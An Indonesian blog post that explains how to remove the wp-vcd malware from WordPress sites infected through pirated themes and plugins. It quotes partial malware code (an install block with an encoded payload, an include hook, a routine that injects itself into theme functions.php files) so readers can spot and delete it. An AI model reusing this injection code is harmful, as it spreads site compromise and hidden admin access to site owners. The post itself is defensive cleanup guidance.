Friday , 17 August 2018

Mengatasi WordPress yang Terkena Malware wp-vcd

Para pemilik website mungkin tidak menyadari banyak sekali serangan jahat dan tersembunyi yang mengintai WordPress, meski begitu basis CMS WordPress dipilih karena fungsi dan kemudahan dalam operasional sebuah website.

Hal yang baru ini cukup banyak mengakibatkan gangguan adalah penyebaran kode jahat yang disisipkan pada plugin maupun theme bajakan, malware ini berkode genetik ‘100010010’ dengan membawa banyak gangguan, terutama iklan – iklan yang mendadak muncul ketika halaman website diakses, meski tidak berbahaya secara sistem, tapi cukup menganggu dan memberikan resiko tinggi sebab malware ini jelas memiliki akses kedalam website anda melalui akses administrator yang disembunyikan dengan username ‘100010010’

Proses infeksi malware WP-VCD ini berjalan cukup cepat, dimulai semenjak plugin/theme tersebut diinstal dan mengaktifkan file pada folder di dalam theme/plugin  yaitu “../includes/init.php” , yang berisi kode instalasi seperti dibawah ini

//install_code
DEFINE(‘MAX_LEVEL’, 2);
DEFINE(‘MAX_ITERATION’, 50);
DEFINE(‘P’, $_SERVER[‘DOCUMENT_ROOT’]);

$GLOBALS[‘WP_CD_CODE’] = ‘PD9waHANCg0KLy9pbnN0YWxsX2NvZGUNCg0KCSRpbnd…’;

. . .

if ($file = @file_get_contents(__FILE__))
{$file = preg_replace(‘!//install_code.*//install_code_end!s’, ”, $file);
$file = preg_replace(‘!<\?php\s*\?>!s’, ”, $file);
@file_put_contents(__FILE__, $file);}
}
//install_code_end

kemudian hasil dari instalasi tersebut melahirkan beberapa file diantaranya:

  • /wp-includes/wp-tmp.php
  • /wp-includes/wp-vcd.php

dan memodifikasi bagian atas dari

  • /wp-includes/post.php
  • /wp-includes/class.wp.php

Perlu diketahui malware ini dipastikan mampu menyebar ke seluruh website berbasis WordPress yang berada didalam hosting yg sama, jadi kalau anda memiliki lebih dari 1 wordpress dalam satu hosting kemungkinan dapat terinfeksi.

Lalu bagaimana menanganinya?

Mereset ulang File wordpress.

Jika kita tidak tau letak dan bentuk file malware, tentu kita akan kesulitan mencari file tersebut jika di lakukan secara manual. Satu satunya jala kita mereset file wordpress. Namun di sarankan tidak semua file di ganti agar settingan blog kita tidak berubah. Berikut caranya:

  1. Login ke cpanel
  2. Masuk ke File Manager
  3. Hapus semua file wordpress yang ada di root ( home/public-html jika hanya terdapat satu domain) sebagai tempat default lokasi file wordpress kecuali folder wp-content dan file-config.php .
  4. Masih dilokasi yang sama, upload kembali wordpress terbaru tanpa folder wp content dan sample-config.php

Tetapi cara ini masih tetap rentan terkena malware. Anda dapat menginstal plugin untuk mendeteksi script malware jika website anda terkena malware kembali.

salah satunya plugin yang bisa mendeteksi malware adalah plugin Wordfence

Plugin gratis antimalware ini cukup ampuh untuk menscan serta mendeteksi malware dan menghapusnya. Setelah melakukan scan menggunakan wordfence, file malware akan terdeteksi. Sebelum klik delete, Anda dapat melihat dulu bentuk script file malware tersebut. Klik view file yang berubah. Maka wordfence akan menunjukan file/script yang di susupkan malware. Script malware akan di blok lebih tebal oleh wordfence. Tentu ini  memudahkan kita untuk menemukan script jahat malware

Kemudian Buka folder yang sma persis dengan lokasi script malware yang di tunjukan oleh wordfence. Kemudian hapus semuanya.

Tips menghapus malware wp-vcd secara manual:
  • Login ke cpanel, kemudian anda bisa mulai melakukan pencarian file malware di folder ../wp-includes/
  • cari file wp-vcd.php, lalu delete file.
  • cari file wp-tmp.php, lalu delete file.
  • cari file post.php, lalu edit dan hapus script malware

Contoh Script :

<?php if (file_exists(dirname(__FILE__) . ‘/wp-vcd.php’)) include_once(dirname(__FILE__) . ‘/wp-vcd.php’); ?>

  • kemudian masuk ke folder ../wp-content/themes/(nama themes yang digunakan)/functions.php,
  • lalu edit dan hapus bagian script malware dari atas hingga ketemu titik ?><?php

Contoh Script :

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . ‘functions.php’)){
if (strpos($content, ‘WP_V_CD’) === false){
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . ‘functions.php’, $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . ‘functions.php’ , $time );
}
else { $ping = false; }
}

  • dan terakhir, pastikan diperiksa di setiap folder sesuai website anda, jka ada bersihkan sesuai cara diatas.

Agar tidak terjadi lagi selalu pastikan mengecek perubahan yg terjadi di server website anda dan hindari menggunakan plugin/theme yang bukan dari situs resminya, atau memastikan anda mengeceknya sebelum dipasang.

Note: Malware bisa masuk melalui komputer anda dan mengikut file yang kita upload ke cpanel. Jika di biarkan ini bisa menyebar ke jaringan internet dan menginfeksi siapa saja. Karena itu harus menjaga kesehatan website anda.

Leave a Reply